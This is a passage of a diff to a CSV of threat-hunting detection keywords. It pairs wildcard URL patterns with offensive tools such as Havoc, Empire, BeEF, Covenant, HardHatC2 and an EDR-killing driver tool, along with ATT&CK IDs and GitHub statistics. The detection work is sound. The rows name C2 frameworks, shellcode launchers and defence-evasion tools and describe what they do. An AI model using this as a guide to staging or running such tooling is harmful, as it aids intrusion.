tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*http*/127.0.0.1*:1337*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*http*/charlotte.dll*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" -"*http*/demon.dll","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - 
T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*http*/demon.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*http*/demos/butcher/index.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*http*/john/Test/raw/master/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*http*/charlotte.dll*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*http*/demon.dll","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*http*/demon.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*http*/demos/butcher/index.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*http*/john/Test/raw/master/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*http*/localhost*:1337*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - 
T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*http*/zha0gongz1*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*http*://*/Terminator.sys","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - 
T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" 
@@ -11304,7 +11457,7 @@ "*http*://127.0.0.1:5556*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*http*://localhost:4433*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*http*://localhost:5556*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*http*:3000/hook.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*http*:3000/hook.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*http*:3200/manjusaka*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*http*:801/bq1iFEP2*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*http*127.0.0.1:21802*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" 
@@ -11312,7 +11465,7 @@ "*http*127.0.0.1:5000*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:50050*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*http*127.0.0.1:5096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*http*127.0.0.1:57230*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*http*127.0.0.1:57230*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*http*127.0.0.1:7096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 
- T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:8080/*.dll*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:8080/*.exe*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" 
@@ -11323,7 +11476,7 @@ "*http*localhost:5000*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*http*localhost:50050*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*http*localhost:5096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*http*localhost:57230*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*http*localhost:57230*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*http*localhost:7096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 
- T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*http*localhost:9631*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*http.title:*BIG-IP®*- Redirect*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","1","54","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z" 
@@ -11335,112 +11488,112 @@ "*http://*Microsoft.ActiveDirectory.Management.dll*","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" "*http://10.10.13.37*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*http://127.0.0.1/CrossC2*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*http://127.0.0.1/FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*http://127.0.0.1:3000/ui/panel*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*http://127.0.0.1/FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*http://127.0.0.1:3000/ui/panel*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*http://127.0.0.1:35000*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*http://127.0.0.1:443/aaaaaaaaa*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*http://127.0.0.1:443/bbbbbbbbb*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*http://127.0.0.1:7444*","offensive_tool_keyword","mythic","A collaborative multi-platform 
red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*http://127.0.0.1:7474/browser/*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*http://127.0.0.1:7444*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*http://127.0.0.1:7474/browser/*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*http://127.0.0.1:8000/1.jpg*","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","0","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" -"*http://127.0.0.1:8080*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*http://127.0.0.1:9090/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*http://192.168.1.179:8000/session*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-02T19:54:24Z","2023-04-28T01:58:18Z" +"*http://127.0.0.1:8080*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*http://127.0.0.1:9090/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*http://192.168.1.179:8000/session*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" "*http://LhOsT/FiLNaMe.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation 